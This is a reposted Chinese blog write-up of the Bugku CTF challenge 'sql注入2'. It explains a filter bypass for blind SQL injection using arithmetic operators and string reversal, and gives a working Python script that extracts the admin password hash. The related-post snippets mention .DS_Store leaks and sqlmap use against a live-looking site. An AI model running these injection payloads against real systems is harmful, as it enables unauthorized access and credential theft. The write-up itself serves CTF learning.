Bugku sql注入2 writeup

最新推荐文章于 2020-03-23 22:35:03 发布
最新推荐文章于 2020-03-23 22:35:03 发布
阅读量4.3k 收藏 1
点赞数
分类专栏: ctf 文章标签: Bugku sql注入 writeup bugku sql注入2  wp

转载自:http://hu3sky.ooo/2018/08/18/bugku%20sql2/

网上没有一个正常做出来了的
看了叶师傅的wp,跟着学一遍
username的注入,盲注
根据username的返回不同
fuzz,几乎都过滤完了。
没过滤的 !,!=,=,+,-,^,%
数字型时,可以用^进行闭合

and这些也被过滤。

需要用到-1-
'admin'-1-'' = -1
'admin'-0-'' = 0

我们发现-0的时候,为true,-1的时候为false
那么这是为什么呢?
我们猜想后台sql语句构造为

$sql = select * from users where username=$username;
在字符串username的值和数字0比较的时候,字符串变为了0
故此0=0

构造语句

ascii(substr((select database()),1,1))>1
很多过滤了,这个语句没法使用
用到一个倒着截取
假设:
passwd=abc123
那么我们用以下方式

1
2
3

mid((passwd)from(-1)):3
mid((passwd)from(-2)):23
mid((passwd)from(-3):123

 

倒着看的第一位都是3,显然不行,无法截取出来,于是想到反转
先反转
REVERSE(MID((passwd)from(-%d))
再去最后一位
mid(REVERSE(MID((passwd)from(%-d)))from(-1))
在比较ASCII
ascii(mid(REVERSE(MID((passwd)from(%-d)))from(-1)))>1

 

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

import requests as rq
flag=""
url='http://120.24.86.145:8007/web2/login.php'
cookie = {
    'PHPSESSID':'s1hcgs1gbudti520fvski6ih1u3kn2ko'
}
for i in range(1,33):
    for j in '0123456789abcdef':
        username="admin'-(ascii(mid(REVERSE(MID((passwd)from(-"+str(i)+")))from(-1)))="+str(ord(j))+")-'"
        data={'uname':username,'passwd':'hu3sky'}
        r=rq.post(url=url,data=data,cookies=cookie)
        if "username error!!@_@" in r.text:
            flag=flag+j
            print(flag)
            break

 

  

得到密码的md5值005b81fd960f61505237dbb7a3202910解码得到admin123

登录实时监控执行ls命令

 

xuchen16
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku Web CTF-sql注入2
No Title
01-14 664
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
bugku sql注入2
Daniel的博客
09-20 3147
题目: 全都过滤了。。。。。。我一个萌新肯定绕不过,,,经别人提醒,工具扫一下目录 发现有.DS_store文件泄露,用脚本工具查看一下,看到有个flag的目录,打开即可
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 560
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
bugku-Web-sql注入2(.DS_Store文件泄漏)
Sea_Sand息禅
03-31 982
泄露扫描脚本下载目录:https://github.com/lijiejie/ds_store_exp .DS_Store文件泄漏脚本扫描: 这些文件脚本已经给我们下载保存了,直接访问flag文件得到flag。 ...
Bugku SQL注入2
小白渣的博客
09-18 803
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
sql注入2-BugkuCTF平台
~airrudder~
03-23 3529
sql注入2-BugkuCTF平台 方法1、这道题是DS_Store源码泄露,跑一下就出来了,自动生成了一个文件夹“123.206.87.240_8007”,打开找到flag文件即可得到答案。 方法2、利用字符串与数字做运算时,字符串会转为数字再做运算,例如"abc"=""=0,"12ab"=12>11,可看下图示例,若是username=0-1=-1时就会报错,但username=0-...
BugKusql注入
D-R0s1的博客
08-08 875
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
SQL注入(三)#sql注入 bugku
pumpkin9
04-12 1163
宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个 汉字(前一个 ascii码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ (转换的函数或者思路会在每一关遇到的时候介绍)。 因此我们在此想办法将 ‘ 前面添加的 \ 除掉,一般有两种思路: 1、%df 吃掉 \ 具体的原因是 urlen...
bugku-实战2-注入
偷一个月亮
06-29 320
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag
bugkuCTF_sql2
帅醉了的博客
03-22 211
详细的记录一次bugkuCTF上的sql2 无论正确与否都不sql语法报错 立马想到使用盲注,提示非法字符 发现‘=’可通过,用两边的空相等为真 拿控制位置’=(0)=’ 判断出密码为32位,空格被过滤,使用payload '=(select(1)from(admin)where(length(passwd)=32))=' 判断最后一位字符为0,payload: '=(select...
bugkuctf 多次,sql2注入2
舞动的獾
07-27 430
这道题有两个关卡,主要是学到了点儿报错注入判断过滤,这里就记录一下 以为这个注入会与id的选取有所关系,爆破了一下,发现当id=5时,出现了如下的界面 但是,后面的尝试,发现注入的话,与id=5没啥大的关系 本题给我以后的注入提供了思路,我会首先判断’号的报错以及注释符的选取后,尝试找到哪些数据被过滤掉了。 当我们输入’ 尝试闭合:’#,失败了,’%23,%27%23,’–+ 尝试输入有多...
Bugku web进阶 实战2-注入
qq_33567663的博客
11-13 713
访问网址一一查看所链接,发现About-news存在可能注入的点,http://www.kabelindo.co.id/readnews.php?id=25 burp抓包另存为txt文件,sqlmap爆破 获取flag    ...
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
简单的SQL注入2
雨九九的小窝
10-25 715
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
bugku-sql注入2 (附详细代码)
偷一个月亮
06-20 1940
构造select * from * where uname = $_POST[uname] uname=admin’-’ 此时uname=-1,不行 $sql = select * from users where username=$username; 在字符串username的值和数字0比较的时候,字符串变为了0 故此0=0 payload:admin’-(ascii(mid(R...
bugku login2
偷一个月亮
06-29 974
bugkuCTF(SQL注入2)
痴人说梦梦中人
03-29 1339
看了很多writeup,大都是用的文件泄露漏洞获得的flag,鉴于本人水平有限还是没能看懂真正的sql注入,只能偷懒了,还是有些收获 大致思路就是先用nikto跑出站点的漏洞OSVDB-6694: /web2/.DS_Store,然后用ds_store_exp.py脚本跑出文件列表,获得flag.(nikto安装apt-get install nikto,脚本下载地址,如果提示缺少模块lib.ds...
webgote的例子(2)Sql注入(SearchGET)
时光凉春衫薄的博客
03-25 254
Sql注入(Search/GET)   大家好!!! 现如今web服务在我们的网络上遍地都是,各个终端设备成为我们看不见的客户,web服务也成为公司的招牌。80 443为我们展现的视角也是多姿多彩但背后新闻爆出的安全风险事故有时也让我们触目惊心,近年来随着各个公司网络安全意识不断提高发生的安全事故也明显下降,但更高级的攻击手段也时时刻刻让企业面临着挑战。如今不妨让我们了解一下这些攻击的原...
GKCTF2021 WriteUp:Web漏洞利用与EJS RCE详解
"GKCTF2021官方WriteUp包含了两个主要的Web安全挑战:ezcms和eznode。在ezcms中,利用模板注入和目录穿越漏洞获取flag;在eznode中,通过绕过严格过滤的WAF并利用原型链污染实现远程代码执行(RCE)" 在ezcms挑战中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值